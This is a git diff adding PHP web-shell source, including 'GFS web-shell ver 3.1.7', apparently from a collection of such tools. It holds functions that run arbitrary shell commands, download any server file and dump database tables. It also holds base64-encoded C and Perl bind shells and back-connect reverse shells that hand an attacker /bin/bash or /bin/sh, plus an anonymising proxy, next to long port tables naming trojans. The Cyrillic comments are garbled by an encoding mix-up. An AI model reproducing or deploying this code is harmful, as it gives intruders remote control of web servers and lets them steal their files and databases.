+$port[3264] = "ccmail";
+$port[3283] = "Apple NetAssitant";
+$port[3288] = "COPS";
+$port[3305] = "ODETTE";
+$port[3306] = "mySQL";
+$port[3389] = "RDP Protocol (Terminal Server)";
+$port[3521] = "netrek";
+$port[4000] = "icq, command-n-conquer and shell nfm";
+$port[4321] = "rwhois";
+$port[4333] = "mSQL";
+$port[4444] = "KRB524";
+$port[4827] = "HTCP";
+$port[5002] = "radio free ethernet";
+$port[5004] = "RTP";
+$port[5005] = "RTP";
+$port[5010] = "Yahoo! Messenger";
+$port[5050] = "multimedia conference control tool";
+$port[5060] = "SIP";
+$port[5150] = "Ascend Tunnel Management Protocol";
+$port[5190] = "AIM";
+$port[5500] = "securid";
+$port[5501] = "securidprop";
+$port[5423] = "Apple VirtualUser";
+$port[5555] = "Personal Agent";
+$port[5631] = "PCAnywhere data";
+$port[5632] = "PCAnywhere";
+$port[5678] = "Remote Replication Agent Connection";
+$port[5800] = "VNC";
+$port[5801] = "VNC";
+$port[5900] = "VNC";
+$port[5901] = "VNC";
+$port[6000] = "X Windows";
+$port[6112] = "BattleNet";
+$port[6502] = "Netscape Conference";
+$port[6667] = "IRC";
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+$port[6699] = "napster";
+$port[6776] = "Sub7";
+$port[6970] = "RTP";
+$port[7007] = "MSBD, Windows Media encoder";
+$port[7070] = "RealServer/QuickTime";
+$port[7777] = "cbt";
+$port[7778] = "Unreal";
+$port[7648] = "CU-SeeMe";
+$port[7649] = "CU-SeeMe";
+$port[8000] = "iRDMI/Shoutcast Server";
+$port[8010] = "WinGate 2.1";
+$port[8080] = "HTTP";
+$port[8181] = "HTTP";
+$port[8383] = "IMail WWW";
+$port[8875] = "napster";
+$port[8888] = "napster";
+$port[8889] = "Desktop Data TCP 1";
+$port[8890] = "Desktop Data TCP 2";
+$port[8891] = "Desktop Data TCP 3: NESS application";
+$port[8892] = "Desktop Data TCP 4: FARM product";
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+$port[8894] = "Desktop Data TCP 6: COAL application";
+$port[9000] = "CSlistener";
+$port[10008] = "cheese worm";
+$port[11371] = "PGP 5 Keyserver";
+$port[13223] = "PowWow";
+$port[13224] = "PowWow";
+$port[14237] = "Palm";
+$port[14238] = "Palm";
+$port[18888] = "LiquidAudio";
+$port[21157] = "Activision";
+$port[22555] = "Vocaltec Web Conference";
+$port[23213] = "PowWow";
+$port[23214] = "PowWow";
+$port[23456] = "EvilFTP";
+$port[26000] = "Quake";
+$port[27001] = "QuakeWorld";
+$port[27010] = "Half-Life";
+$port[27015] = "Half-Life";
+$port[27960] = "QuakeIII";
+$port[30029] = "AOL Admin";
+$port[31337] = "Back Orifice";
+$port[32777] = "rpc.walld";
+$port[45000] = "Cisco NetRanger postofficed";
+$port[32773] = "rpc bserverd";
+$port[32776] = "rpc.spray";
+$port[32779] = "rpc.cmsd";
+$port[38036] = "timestep";
+$port[40193] = "Novell";
+$port[41524] = "arcserve discovery";
+////////////////////////////////////////////////////////////////////////////////
+////////////////////////////////ÔÓÍÊÖÈÈ/////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////////
+function rep_char($ch,$count)                  //Ïîâòîğåíèå ñèìâîëà
+{
+ $res="";
+ for($i=0; $i<=$count; ++$i){
+  $res.=$ch."";
+ }
+ return $res;
+}
+function ex($comd)                             //Âûïîëíåíèå êîìàíäû
+{
+ $res = '';
+ if (!empty($comd)){
+  if(function_exists('exec')){
+    exec($comd,$res);
+    $res=implode("\n",$res);
+   }elseif(function_exists('shell_exec')){
+    $res=shell_exec($comd);
+   }elseif(function_exists('system')){
+    ob_start();
+    system($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(function_exists('passthru')){
+    ob_start();
+    passthru($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(is_resource($f=popen($comd,"r"))){
+    $res = "";
+    while(!feof($f)) { $res.=fread($f,1024); }
+    pclose($f);
+  }
+ }
+ return $res;
+}
+function sysinfo()                             //Âûâîä SYSINFO
+{
+ global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS;
+ echo("<b><font  face=Verdana size=2> System information:<br><font size=-2>
+      <hr>");
+ echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "):
+         ("Safe Mode: </b><font color=red>OFF</font><b> "));
+ $row_dis_func=explode(', ',$dis_func);
+ echo ("PHP: </b><font color=blue>".phpversion()."</font><b> ");
+ echo ("MySQL: </b>");
+ if($mysql_stat){
+  echo "<font color=green>ON </font><b>";
+ }
+ else {
+  echo "<font color=red>OFF </font><b>";
+ }
+ echo "cURL: </b>";
+ if($curl_on){
+  echo "<font color=green>ON</font><b><br>";
+ }else
+  echo "<font color=red>OFF</font><b><br>";
+ if ($dis_func!=""){
+  echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>";
+ }
+ $uname=ex('uname -a');
+ echo "OS: </b><font color=blue>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br><b>");
+ }else
+  echo $uname."</font><br><b>";
+ $id = ex('id');
+ echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
+ echo "id: </b><font color=blue>";
+ if (!empty($id)){
+  echo $id."</font><br><b>";
+ }else
+  echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
+       "</font><br><b>";
+ echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>";
+ if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){
+  echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>";
+ }
+ echo "<hr size=3 color=black>";
+ echo "</font></font>";
+}
+function read_dir($dir)                 //÷èòàåì ïàïêó
+{
+ $d=opendir($dir);
+ $i=0;
+ while($r=readdir($d)){
+  $res[$i]=$r;
+  $i++;
+ }
+ return $res;
+}
+function permissions($mode,$file) {            //îïğåäåëåíèå ñâîéñòâ
+ $type=filetype($file);
+ $perms=$type[0];
+ $perms.=($mode & 00400) ? "r" : "-";
+ $perms.=($mode & 00200) ? "w" : "-";
+ $perms.=($mode & 00100) ? "x" : "-";
+ $perms.=($mode & 00040) ? "r" : "-";
+ $perms.=($mode & 00020) ? "w" : "-";
+ $perms.=($mode & 00010) ? "x" : "-";
+ $perms.=($mode & 00004) ? "r" : "-";
+ $perms.=($mode & 00002) ? "w" : "-";
+ $perms.=($mode & 00001) ? "x" : "-";
+ $perms.="(".$mode.")";
+ return $perms;
+}
+function open_file($fil, $m, $d)                          //Îòêğûòü ôàéë
+{
+ if (!($fp=fopen($fil,$m))) {
+  $res="Error opening file!\n";
+ }else{
+  ob_start();
+  readfile($fil);
+  $res=ob_get_contents();
+  ob_end_clean();
+  if (!(fclose($fp))){
+   $res="ERROR CLOSE";
+  }
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr><td alling=center><b>   ".$fil."   </b></td></tr>";
+ echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+ echo $res;
+ echo "
\ No newline at end of file
diff --git a/php/GFS_web-shell_ver_3.1.7_-_PRiV8.php b/php/GFS_web-shell_ver_3.1.7_-_PRiV8.php
new file mode 100644
index 0000000..ca722f2
--- /dev/null
+++ b/php/GFS_web-shell_ver_3.1.7_-_PRiV8.php
@@ -0,0 +1,520 @@
+<?
+/*
+*************************
+*  ###### ##### ######  *
+*  ###### ##### ######  *
+*  ##     ##    ##      *
+*  ##     ####  ######  *
+*  ##  ## ####  ######  *
+*  ##  ## ##        ##  *
+*  ###### ##    ######  *
+*  ###### ##    ######  *
+*                       *
+* Group Freedom Search! *
+*************************
+GFS Web-Shell
+*/
+error_reporting(0);
+if($_POST['b_down']){
+ $file=fopen($_POST['fname'],"r");
+ ob_clean();
+ $filename=basename($_POST['fname']);
+ $filedump=fread($file,filesize($_POST['fname']));
+ fclose($file);
+ header("Content-type: application/octet-stream");
+ header("Content-disposition: attachment; filename=\"".$filename."\";");
+ echo $filedump;
+ exit();
+}
+if($_POST['b_dtable']){
+ $dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ if($dump!=""){
+  header("Content-type: application/octet-stream");
+  header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
+  echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  exit();
+ }else
+  die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
+}
+set_magic_quotes_runtime(0);
+set_time_limit(0);
+ini_set('max_execution_time',0);
+ini_set('output_buffering',0);
+if(version_compare(phpversion(), '4.1.0')==-1){
+ $_POST=&$HTTP_POST_VARS;
+ $_GET=&$HTTP_GET_VARS;
+ $_SERVER=&$HTTP_SERVER_VARS;
+}
+if (get_magic_quotes_gpc()){
+ foreach ($_POST as $k=>$v){
+  $_POST[$k]=stripslashes($v);
+ }
+ foreach ($_SERVER as $k=>$v){
+  $_SERVER[$k]=stripslashes($v);
+ }
+}
+if ($_POST['username']==""){
+ $_POST['username']="root";
+}
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////// Ïåğåìåííûå ///////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
+$r_act=$_POST['r_act'];
+$safe_mode=ini_get('safe_mode');               //ñòàòóñ áåçîïàñíîãî ğåæèìà
+$mysql_stat=function_exists('mysql_connect');  //Íàëè÷èå mysql
+$curl_on=function_exists('curl_version');      //íàëè÷èå cURL
+$dis_func=ini_get('disable_functions');        //çàáëîêèğîâàíûå ôóíêöèè
+$HTML=<<<html
+<html>
+<head>
+<title>GFS web-shell ver 3.1.7</title>
+</head>
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+html;
+$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
+MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
+gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
+ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
+mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
+LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
+$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
+X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
+TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
+FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
+W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
+Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
+lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
+BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
+VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
+bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
+lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
+BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
+VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
+CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
+7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
+ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
+XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
+c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
+iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
+R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
+29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
+ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
+QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
+Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
+QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
+PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
+0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
+A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+$port[2] = "Management Utility";
+$port[3] = "Compression Process";
+$port[5] = "rje (Remote Job Entry)";
+$port[7] = "echo";
+$port[9] = "discard";
+$port[11] = "systat";
+$port[13] = "daytime";
+$port[15] = "netstat";
+$port[17] = "quote of the day";
+$port[18] = "send/rwp";
+$port[19] = "character generator";
+$port[20] = "ftp-data";
+$port[21] = "ftp";
+$port[22] = "ssh, pcAnywhere";
+$port[23] = "Telnet";
+$port[25] = "SMTP (Simple Mail Transfer)";
+$port[27] = "ETRN (NSW User System FE)";
+$port[29] = "MSG ICP";
+$port[31] = "MSG Authentication";
+$port[33] = "dsp (Display Support Protocol)";
+$port[37] = "time";
+$port[38] = "RAP (Route Access Protocol)";
+$port[39] = "rlp (Resource Location Protocol)";
+$port[41] = "Graphics";
+$port[42] = "nameserv, WINS";
+$port[43] = "whois, nickname";
+$port[44] = "MPM FLAGS Protocol";
+$port[45] = "Message Processing Module [recv]";
+$port[46] = "MPM [default send]";
+$port[47] = "NI FTP";
+$port[48] = "Digital Audit Daemon";
+$port[49] = "TACACS, Login Host Protocol";
+$port[50] = "RMCP, re-mail-ck";
+$port[53] = "DNS";
+$port[57] = "MTP (any private terminal access)";
+$port[59] = "NFILE";
+$port[60] = "Unassigned";
+$port[61] = "NI MAIL";
+$port[62] = "ACA Services";
+$port[63] = "whois++";
+$port[64] = "Communications Integrator (CI)";
+$port[65] = "TACACS-Database Service";
+$port[66] = "Oracle SQL*NET";
+$port[67] = "bootps (Bootstrap Protocol Server)";
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+$port[70] = "Gopher";
+$port[71] = "Remote Job Service";
+$port[72] = "Remote Job Service";
+$port[73] = "Remote Job Service";
+$port[74] = "Remote Job Service";
+$port[75] = "any private dial out service";
+$port[76] = "Distributed External Object Store";
+$port[77] = "any private RJE service";
+$port[78] = "vettcp";
+$port[79] = "finger";
+$port[80] = "World Wide Web HTTP";
+$port[81] = "HOSTS2 Name Serve";
+$port[82] = "XFER Utility";
+$port[83] = "MIT ML Device";
+$port[84] = "Common Trace Facility";
+$port[85] = "MIT ML Device";
+$port[86] = "Micro Focus Cobol";
+$port[87] = "any private terminal link";
+$port[88] = "Kerberos, WWW";
+$port[89] = "SU/MIT Telnet Gateway";
+$port[90] = "DNSIX Securit Attribute Token Map";
+$port[91] = "MIT Dover Spooler";
+$port[92] = "Network Printing Protocol";
+$port[93] = "Device Control Protocol";
+$port[94] = "Tivoli Object Dispatcher";
+$port[95] = "supdup";
+$port[96] = "DIXIE";
+$port[98] = "linuxconf";
+$port[99] = "Metagram Relay";
+$port[100] = "[unauthorized use]";
+$port[101] = "HOSTNAME";
+$port[102] = "ISO, X.400, ITOT";
+$port[103] = "Genesis Point-to-Point";
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+$port[105] = "CCSO name server protocol";
+$port[106] = "poppassd";
+$port[107] = "Remote Telnet Service";
+$port[108] = "SNA Gateway Access Server";
+$port[109] = "POP2";
+$port[110] = "POP3";
+$port[111] = "Sun RPC Portmapper";
+$port[112] = "McIDAS Data Transmission Protocol";
+$port[113] = "Authentication Service";
+$port[115] = "sftp (Simple File Transfer Protocol)";
+$port[116] = "ANSA REX Notify";
+$port[117] = "UUCP Path Service";
+$port[118] = "SQL Services";
+$port[119] = "NNTP";
+$port[120] = "CFDP";
+$port[123] = "NTP";
+$port[124] = "SecureID";
+$port[129] = "PWDGEN";
+$port[133] = "statsrv";
+$port[135] = "loc-srv/epmap";
+$port[137] = "netbios-ns";
+$port[138] = "netbios-dgm (UDP)";
+$port[139] = "NetBIOS";
+$port[143] = "IMAP";
+$port[144] = "NewS";
+$port[150] = "SQL-NET";
+$port[152] = "BFTP";
+$port[153] = "SGMP";
+$port[156] = "SQL Service";
+$port[161] = "SNMP";
+$port[175] = "vmnet";
+$port[177] = "XDMCP";
+$port[178] = "NextStep Window Server";
+$port[179] = "BGP";
+$port[180] = "SLmail admin";
+$port[199] = "smux";
+$port[210] = "Z39.50";
+$port[213] = "IPX";
+$port[218] = "MPP";
+$port[220] = "IMAP3";
+$port[256] = "RAP";
+$port[257] = "Secure Electronic Transaction";
+$port[258] = "Yak Winsock Personal Chat";
+$port[259] = "ESRO";
+$port[264] = "FW1_topo";
+$port[311] = "Apple WebAdmin";
+$port[350] = "MATIP type A";
+$port[351] = "MATIP type B";
+$port[363] = "RSVP tunnel";
